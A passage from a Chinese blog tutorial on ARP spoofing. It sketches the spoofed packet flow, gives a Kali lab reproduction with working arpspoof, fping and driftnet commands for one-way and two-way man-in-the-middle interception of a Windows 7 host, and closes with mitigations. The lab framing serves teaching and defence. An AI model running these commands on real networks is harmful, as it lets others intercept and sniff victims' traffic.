网关 -&gt; PC1：网关回复的报文 &#123;dst_ip: <span class="hljs-string">&quot;PC1&quot;</span>, src_ip: <span class="hljs-string">&quot;网关&quot;</span>, dst_mac: <span class="hljs-string">&quot;欺骗者&quot;</span>, src_mac: <span class="hljs-string">&quot;网关&quot;</span>&#125;
PC1：看到dst_mac不是自己，直接丢弃
欺骗者 -&gt; PC1：欺骗者看到后，将报文修改为：&#123;dst_ip: <span class="hljs-string">&quot;PC1&quot;</span>, src_ip: <span class="hljs-string">&quot;网关&quot;</span>, dst_mac: <span class="hljs-string">&quot;PC1&quot;</span>, src_mac: <span class="hljs-string">&quot;欺骗者&quot;</span>&#125;

<span class="hljs-comment"># 步骤四：就变为如下图所示，主机A和主机B的逻辑链路就断了。</span>
备注：arp记录有失效，失效过了就没有了
</code></pre>



<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250906164103785.png" alt="img"></p>
<h3 id="复现-1"><a href="#复现-1" class="headerlink" title="复现"></a>复现</h3><pre><code class="hljs bash"><span class="hljs-comment">## 环境准备 Win7 &amp; Kali</span>
<span class="hljs-comment"># Kali 安装 arpspoof 相关组件</span>
apt install dsniff 
apt install driftnet
apt install kali-desktop-core <span class="hljs-comment"># 如果安装dsniff报错，提示缺少这个依赖，需要重启服务，选择“Yes”</span>
arpspoof -v

<span class="hljs-comment">## 步骤1，探活，只ping	一次，</span>
fping -asg 192.168.16.0/24 -c 1 

<span class="hljs-comment">## 单向欺骗操作：使用网卡 eth0 欺骗PC1 192.168.16.129， 我是 192.168.16.2</span>
arpspoof -i eth0 -t 192.168.16.129 192.168.16.2

<span class="hljs-comment">## 双向欺骗操作：</span>
<span class="hljs-comment"># kali允许转发</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;1&quot;</span> &gt; /proc/sys/net/ipv4/ip_forward
<span class="hljs-comment"># kali终端1</span>
arpspoof -i eth0 -t 192.168.16.129 -r 192.168.16.2
<span class="hljs-comment"># kali终端2: 运行一个窗口 </span>
driftnet -i eht0

<span class="hljs-comment">## 同步操作2：</span>
<span class="hljs-comment"># Win7 PC1</span>
ping www.baidu.com -t 
arp -a <span class="hljs-comment"># 查看没有欺骗前的192.168.16.2的mac地址后缀是.59</span>
</code></pre>

<h3 id="相关截图如下-1"><a href="#相关截图如下-1" class="headerlink" title="相关截图如下"></a>相关截图如下</h3><p>!(<a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250906171443108.png">https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250906171443108.png</a>)</p>
<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250906171735213.png" alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250906171812747.png" alt="欺骗后昂立"></p>
<p>欺骗后昂立</p>
<p><img src="file:///C:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20250906171858476.png" alt="欺骗前后网关MAC地变成kali"></p>
<p>欺骗前后网关MAC地变成kali</p>
<p><img src="file:///C:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20250906172142614.png" alt="欺骗时网关的MAC地址变成e3，取消欺骗后变为网关的59"></p>
<p>欺骗时网关的MAC地址变成e3，取消欺骗后变为网关的59</p>
<h3 id="解决方法-1"><a href="#解决方法-1" class="headerlink" title="解决方法"></a>解决方法</h3><pre><code class="hljs bash"><span class="hljs-comment"># 方法1：PC上绑定网关的mac地址</span>
arp -s 192.168.16.2 xx-xx-xx-xx-xx-xx
<span class="hljs-comment"># 方法2：交换机上-流量抑制</span>
根据实际交换机品牌
</code></pre>

<h2 id="0003"><a href="#0003" class="headerlink" title="0003 -"></a>0003 -</h2><hr>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以邮件至 hjxstart@126.com </span>
    </div>
</article>








    




    </div>
    <div class="copyright">
        <p class="footer-entry"><span class="miit">
                <img src="/img/gov.png" title="中华人民共和国工业和信息化部">
                <a target="_blank" rel="noopener" href="http://beian.miit.gov.cn/">粤ICP备2021170625号-1</a>
        </span>
    
    ©2019-2022 hjxstart
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("/img/article-list-bg-img.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
